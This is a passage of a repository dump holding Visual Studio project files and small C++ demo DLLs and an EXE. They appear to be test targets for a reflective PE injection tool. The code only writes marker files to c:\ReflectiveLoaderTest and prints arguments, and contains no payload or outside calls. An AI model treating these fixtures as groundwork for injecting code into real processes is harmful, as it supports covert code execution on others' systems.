10 | #define DEMODLL_API __declspec(dllimport)
11 | #endif
12 | 
13 | using namespace std;
14 | 
15 | extern "C" __declspec( dllexport ) char* StringFunc();
16 | extern "C" __declspec( dllexport ) void VoidFunc();
17 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc();


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <None Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |     <ClInclude Include="DemoDLL.h">
28 |       <Filter>Header Files</Filter>
29 |     </ClInclude>
30 |   </ItemGroup>
31 |   <ItemGroup>
32 |     <ClCompile Include="stdafx.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |     <ClCompile Include="DemoDLL.cpp">
36 |       <Filter>Source Files</Filter>
37 |     </ClCompile>
38 |     <ClCompile Include="dllmain.cpp">
39 |       <Filter>Source Files</Filter>
40 |     </ClCompile>
41 |   </ItemGroup>
42 | </Project>


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     DYNAMIC LINK LIBRARY : DemoDLL Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this DemoDLL DLL for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your DemoDLL application.
 9 | 
10 | 
11 | DemoDLL.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | DemoDLL.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | DemoDLL.cpp
25 |     This is the main DLL source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named DemoDLL.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp:
--------------------------------------------------------------------------------
 1 | // dllmain.cpp : Defines the entry point for the DLL application.
 2 | #include "stdafx.h"
 3 | 
 4 | BOOL APIENTRY DllMain( HMODULE hModule,
 5 |                        DWORD  ul_reason_for_call,
 6 |                        LPVOID lpReserved
 7 | 					 )
 8 | {
 9 | 	switch (ul_reason_for_call)
10 | 	{
11 | 	case DLL_PROCESS_ATTACH:
12 | 	case DLL_THREAD_ATTACH:
13 | 	case DLL_THREAD_DETACH:
14 | 	case DLL_PROCESS_DETACH:
15 | 		break;
16 | 	}
17 | 	return TRUE;
18 | }
19 | 
20 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include <windows.h>
13 | #include <string>
14 | #include <ostream>
15 | #include <sstream>
16 | #include <iostream>
17 | 
18 | 
19 | 
20 | // TODO: reference additional headers your program requires here
21 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 2012
 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Win32 = Debug|Win32
 9 | 		Debug|x64 = Debug|x64
10 | 		Release|Win32 = Release|Win32
11 | 		Release|x64 = Release|x64
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32
15 | 		{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32
16 | 		{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64
18 | 		{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32
19 | 		{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32
20 | 		{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64
21 | 		{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64
22 | 	EndGlobalSection
23 | 	GlobalSection(SolutionProperties) = preSolution
24 | 		HideSolutionNode = FALSE
25 | 	EndGlobalSection
26 | EndGlobal
27 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp:
--------------------------------------------------------------------------------
 1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application.
 2 | //
 3 | 
 4 | #include "stdafx.h"
 5 | 
 6 | using namespace std;
 7 | 
 8 | extern "C" __declspec( dllexport ) void VoidFunc();
 9 | 
10 | 
11 | extern "C" __declspec( dllexport ) void VoidFunc()
12 | {
13 | 	ofstream myfile;
14 | 	_mkdir("c:\\ReflectiveLoaderTest");
15 | 	myfile.open ("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt");
16 | 	myfile << "Dll Void function successfully called.\n";
17 | 	myfile.close();
18 | 	return;
19 | }


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="DemoDLL_RemoteProcess.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |     <ClCompile Include="dllmain.cpp">
36 |       <Filter>Source Files</Filter>
37 |     </ClCompile>
38 |   </ItemGroup>
39 | </Project>


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this DemoDLL_RemoteProcess DLL for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your DemoDLL_RemoteProcess application.
 9 | 
10 | 
11 | DemoDLL_RemoteProcess.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | DemoDLL_RemoteProcess.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | DemoDLL_RemoteProcess.cpp
25 |     This is the main DLL source file.
26 | 
27 | 	When created, this DLL does not export any symbols. As a result, it
28 | 	will not produce a .lib file when it is built. If you wish this project
29 | 	to be a project dependency of some other project, you will either need to
30 | 	add code to export some symbols from the DLL so that an export library
31 | 	will be produced, or you can set the Ignore Input Library property to Yes
32 | 	on the General propert page of the Linker folder in the project's Property
33 | 	Pages dialog box.
34 | 
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 | 
38 | StdAfx.h, StdAfx.cpp
39 |     These files are used to build a precompiled header (PCH) file
40 |     named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj.
41 | 
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 | 
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 | 
48 | /////////////////////////////////////////////////////////////////////////////
49 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp:
--------------------------------------------------------------------------------
 1 | // dllmain.cpp : Defines the entry point for the DLL application.
 2 | #include "stdafx.h"
 3 | 
 4 | using namespace std;
 5 | 
 6 | BOOL APIENTRY DllMain( HMODULE hModule,
 7 |                        DWORD  ul_reason_for_call,
 8 |                        LPVOID lpReserved
 9 | 					 )
10 | {
11 | 	ofstream myfile;
12 | 
13 | 	switch (ul_reason_for_call)
14 | 	{
15 | 	case DLL_PROCESS_ATTACH:
16 | 			_mkdir("c:\\ReflectiveLoaderTest");
17 | 			myfile.open ("c:\\ReflectiveLoaderTest\\DllMain.txt");
18 | 			myfile << "DllMain successfully called.\n";
19 | 			myfile.close();
20 | 		break;
21 | 	case DLL_THREAD_ATTACH:
22 | 	case DLL_THREAD_DETACH:
23 | 	case DLL_PROCESS_DETACH:
24 | 		break;
25 | 	}
26 | 	return TRUE;
27 | }
28 | 
29 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include <windows.h>
13 | #include <iostream>
14 | #include <fstream>
15 | #include <string.h>
16 | #include <direct.h>
17 | 
18 | 
19 | // TODO: reference additional headers your program requires here
20 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 2012
 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}"
 5 | EndProject
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|Win32 = Debug|Win32
11 | 		Debug|x64 = Debug|x64
12 | 		Release|Win32 = Release|Win32
13 | 		Release|x64 = Release|x64
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32
17 | 		{F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32
18 | 		{F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64
19 | 		{F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64
20 | 		{F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32
21 | 		{F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32
22 | 		{F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64
23 | 		{F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64
24 | 		{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32
25 | 		{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32
26 | 		{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64
27 | 		{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64
28 | 		{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32
29 | 		{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32
30 | 		{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64
31 | 		{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64
32 | 	EndGlobalSection
33 | 	GlobalSection(SolutionProperties) = preSolution
34 | 		HideSolutionNode = FALSE
35 | 	EndGlobalSection
36 | EndGlobal
37 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp:
--------------------------------------------------------------------------------
 1 | // DemoExe.cpp : Defines the entry point for the console application.
 2 | //
 3 | 
 4 | #include "stdafx.h"
 5 | #include <iostream>
 6 | 
 7 | using namespace std;
 8 | 
 9 | int _tmain(int argc, _TCHAR* argv[])
10 | {
11 | 	printf("Exe loaded! Printing argc and argv\n\n");
12 | 
13 | 	printf("Argc: %d\n", argc);
14 | 	printf("ArgvAddress: %d\n", argv);
15 | 	
16 | 	for (int i = 0; i < argc; i++)
17 | 	{
18 | 		wprintf(L"Argv: %s\n", argv[i]);
19 | 	}
20 | 
21 | 	printf("Exiting exe\n");
22 | 
23 | 	return 0;
24 | }
25 | 
26 | 
27 | 


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Debug|x64">
  9 |       <Configuration>Debug</Configuration>
 10 |       <Platform>x64</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Release|Win32">
 13 |       <Configuration>Release</Configuration>
 14 |       <Platform>Win32</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <ProjectGuid>{F674A5CE-F75F-4035-90AB-46DEBC670282}</ProjectGuid>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <RootNamespace>DemoExe_MD</RootNamespace>
 25 |   </PropertyGroup>
 26 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 27 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 28 |     <ConfigurationType>Application</ConfigurationType>
 29 |     <UseDebugLibraries>true</UseDebugLibraries>
 30 |     <PlatformToolset>v110</PlatformToolset>
 31 |     <CharacterSet>Unicode</CharacterSet>
 32 |   </PropertyGroup>
 33 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 34 |     <ConfigurationType>Application</ConfigurationType>
 35 |     <UseDebugLibraries>true</UseDebugLibraries>
 36 |     <PlatformToolset>v110</PlatformToolset>
 37 |     <CharacterSet>Unicode</CharacterSet>
 38 |   </PropertyGroup>
 39 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 40 |     <ConfigurationType>Application</ConfigurationType>
 41 |     <UseDebugLibraries>false</UseDebugLibraries>
 42 |     <PlatformToolset>v110</PlatformToolset>
 43 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 44 |     <CharacterSet>Unicode</CharacterSet>
 45 |   </PropertyGroup>
 46 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 47 |     <ConfigurationType>Application</ConfigurationType>
 48 |     <UseDebugLibraries>false</UseDebugLibraries>
 49 |     <PlatformToolset>v110</PlatformToolset>
 50 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 51 |     <CharacterSet>Unicode</CharacterSet>
 52 |   </PropertyGroup>
 53 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 54 |   <ImportGroup Label="ExtensionSettings">
 55 |   </ImportGroup>
 56 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 57 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 58 |   </ImportGroup>
 59 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
 60 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 61 |   </ImportGroup>
 62 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 63 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 64 |   </ImportGroup>
 65 |   <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
 66 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 67 |   </ImportGroup>
 68 |   <PropertyGroup Label="UserMacros" />
 69 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 70 |     <LinkIncremental>true</LinkIncremental>
 71 |   </PropertyGroup>
 72 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 73 |     <LinkIncremental>true</LinkIncremental>
 74 |   </PropertyGroup>
 75 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 76 |     <LinkIncremental>false</LinkIncremental>
 77 |   </PropertyGroup>
 78 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 79 |     <LinkIncremental>false</LinkIncremental>
 80 |   </PropertyGroup>
 81 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 82 |     <ClCompile>
 83 |       <PrecompiledHeader>Use</PrecompiledHeader>
 84 |       <WarningLevel>Level3</WarningLevel>
 85 |       <Optimization>Disabled</Optimization>
 86 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 87 |       <SDLCheck>true</SDLCheck>
 88 |       <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
 89 |     </ClCompile>
 90 |     <Link>
 91 |       <SubSystem>Console</SubSystem>
 92 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 93 |     </Link>
 94 |   </ItemDefinitionGroup>
 95 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 96 |     <ClCompile>
 97 |       <PrecompiledHeader>Use</PrecompiledHeader>
 98 |       <WarningLevel>Level3</WarningLevel>
 99 |       <Optimization>Disabled</Optimization>
100 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
101 |       <SDLCheck>true</SDLCheck>
102 |       <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
103 |     </ClCompile>
104 |     <Link>
105 |       <SubSystem>Console</SubSystem>
106 |       <GenerateDebugInformation>true</GenerateDebugInformation>
107 |     </Link>
108 |   </ItemDefinitionGroup>
109 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
110 |     <ClCompile>
111 |       <WarningLevel>Level3</WarningLevel>
112 |       <PrecompiledHeader>Use</PrecompiledHeader>
113 |       <Optimization>MaxSpeed</Optimization>
114 |       <FunctionLevelLinking>true</FunctionLevelLinking>
115 |       <IntrinsicFunctions>true</IntrinsicFunctions>
116 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
117 |       <SDLCheck>true</SDLCheck>
118 |     </ClCompile>
119 |     <Link>
120 |       <SubSystem>Console</SubSystem>
121 |       <GenerateDebugInformation>true</GenerateDebugInformation>
122 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
123 |       <OptimizeReferences>true</OptimizeReferences>
124 |     </Link>
125 |   </ItemDefinitionGroup>
126 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
127 |     <ClCompile>
128 |       <WarningLevel>Level3</WarningLevel>
129 |       <PrecompiledHeader>Use</PrecompiledHeader>
130 |       <Optimization>MaxSpeed</Optimization>
131 |       <FunctionLevelLinking>true</FunctionLevelLinking>
132 |       <IntrinsicFunctions>true</IntrinsicFunctions>
133 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
134 |       <SDLCheck>true</SDLCheck>
135 |     </ClCompile>
136 |     <Link>
137 |       <SubSystem>Console</SubSystem>
138 |       <GenerateDebugInformation>true</GenerateDebugInformation>
139 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
140 |       <OptimizeReferences>true</OptimizeReferences>
141 |     </Link>
142 |   </ItemDefinitionGroup>
143 |   <ItemGroup>
144 |     <Text Include="ReadMe.txt" />
145 |   </ItemGroup>
146 |   <ItemGroup>
147 |     <ClInclude Include="stdafx.h" />
148 |     <ClInclude Include="targetver.h" />
149 |   </ItemGroup>
150 |   <ItemGroup>
151 |     <ClCompile Include="DemoExe_MD.cpp" />
152 |     <ClCompile Include="stdafx.cpp">
153 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
154 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
155 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
156 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
157 |     </ClCompile>
158 |   </ItemGroup>
159 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
160 |   <ImportGroup Label="ExtensionTargets">
161 |   </ImportGroup>
162 | </Project>


--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
